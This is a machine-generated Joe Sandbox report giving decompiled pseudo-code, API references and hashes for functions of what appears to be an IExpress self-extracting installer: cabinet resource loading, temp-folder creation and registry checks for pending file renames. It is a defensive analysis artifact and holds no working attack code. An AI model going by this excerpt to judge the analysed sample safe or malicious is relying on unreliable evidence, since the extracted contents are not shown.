                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xa69144 = E00A6468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xa69140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xa68584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xa68584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E00A64EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E00A64CA0, E00A64CC0, E00A64980, E00A64A50, E00A64AD0, E00A64B60, E00A64BC0, 1, 0xa69148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xa69148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xa68584; // 0x0
                                                                                                                                                                                                      						E00A644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xa61140, 0, E00A64CD0, 0, 0xa69140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					E00A644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xa69140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xa69140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xa691d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E00A644B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xa68a38 & 0x00000001) == 0 && ( *0xa69a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xa68584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A64FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00A65006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00A6500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00A65030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00A65037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00A6504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00A65051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A65111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A65159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: c53a7bca9267df7ca5ee83a256e89c1093836ea60da349ce0cc0513c56546254
                                                                                                                                                                                                      • Instruction ID: 5c8c98ed0bc656dd9789833c13d1d5308181729675aae0e82b5a25bfc07b3c0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c53a7bca9267df7ca5ee83a256e89c1093836ea60da349ce0cc0513c56546254
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8431DAB1B807117FD720DBF1AD89F6736BCB71AB55F040614F906A21E1DAF98C428A50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A653A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00A6171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E00A61680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E00A6658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E00A66CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xa68a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A653FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2818522747
                                                                                                                                                                                                      • Opcode ID: 80580a54fa5849f7c393806a7e7842cc3aa658f30230abbbe753a7399993b0ff
                                                                                                                                                                                                      • Instruction ID: ece18ce5c1092fa07325d8e8ec39a53d95ef4baf60d9ad99f23fb400303573e5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80580a54fa5849f7c393806a7e7842cc3aa658f30230abbbe753a7399993b0ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96112371B0051477D720DB769C49FAF3A7EEFE2711F050169F647E2290CEB489838AA2
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 478 a65467-a65484 479 a6551c-a65528 call a61680 478->479 480 a6548a-a65490 call a653a1 478->480 483 a6552d-a65539 call a658c8 479->483 484 a65495-a65497 480->484 493 a6554d-a65552 483->493 494 a6553b-a65545 CreateDirectoryA 483->494 486 a65581-a65583 484->486 487 a6549d-a654c0 call a61781 484->487 488 a6558d-a6559d call a66ce0 486->488 495 a654c2-a654d8 GetSystemInfo 487->495 496 a6550c-a6551a call a6658a 487->496 500 a65554-a65557 call a6597d 493->500 501 a65585-a6558b 493->501 498 a65577-a6557c call a66285 494->498 499 a65547 494->499 502 a654fe 495->502 503 a654da-a654dd 495->503 496->483 498->486 499->493 509 a6555c-a6555e 500->509 501->488 510 a65503-a65507 call a6658a 502->510 507 a654f7-a654fc 503->507 508 a654df-a654e2 503->508 507->510 513 a654e4-a654e7 508->513 514 a654f0-a654f5 508->514 509->501 515 a65560-a65566 509->515 510->496 513->496 517 a654e9-a654ee 513->517 514->510 515->486 518 a65568-a65575 RemoveDirectoryA 515->518 517->510 518->486
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A65467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xa691e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00A61680(0xa691e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E00A658C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E00A66CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E00A6597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xa68a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xa69124 = E00A66285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa68a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E00A653A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xa691e4;
                                                                                                                                                                                                      				E00A61781(0xa691e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xa69a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00A6658A(_t48, 0x104, 0xa61140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E00A6658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a654e9
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A654C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6556F
                                                                                                                                                                                                        • Part of subcall function 00A653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A653FB
                                                                                                                                                                                                        • Part of subcall function 00A653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65402
                                                                                                                                                                                                        • Part of subcall function 00A653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6541F
                                                                                                                                                                                                        • Part of subcall function 00A653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6542B
                                                                                                                                                                                                        • Part of subcall function 00A653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-787463151
                                                                                                                                                                                                      • Opcode ID: 001843458fa19ba939393890f5319c431da48aaf85b99ac927c5fecbbb47d9f1
                                                                                                                                                                                                      • Instruction ID: 651379ba837f3247a6dccde168e3dbe081fc5444bc3a086104d5a5669d946168
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 001843458fa19ba939393890f5319c431da48aaf85b99ac927c5fecbbb47d9f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1312771F00A106BCB149BB99D4997F77BFEB91740F18022AE803D3680DFB0CE428A91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 519 a6256d-a6257d 520 a62622-a62627 call a624e0 519->520 521 a62583-a62589 519->521 526 a62629-a6262f 520->526 523 a6258b 521->523 524 a625e8-a62607 RegOpenKeyExA 521->524 525 a62591-a62595 523->525 523->526 527 a625e3-a625e6 524->527 528 a62609-a62620 RegQueryInfoKeyA 524->528 525->526 530 a6259b-a625ba RegOpenKeyExA 525->530 527->526 531 a625d1-a625dd RegCloseKey 528->531 530->527 532 a625bc-a625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A6256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E00A624E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00A64096,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?), ref: 00A625B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?,00A64096), ref: 00A625CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00A61ED3,00000001,00000000,?,?,00A64137,?,00A64096), ref: 00A625DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00A64096,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?), ref: 00A625FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A64096,00000000,00000000,00000000,00000000,?,00A61ED3,00000001,00000000), ref: 00A6261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00A625A8
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00A625C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A625F5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E00A67155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xa672b8);
                                                                                                                                                                                                      				E00A67208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
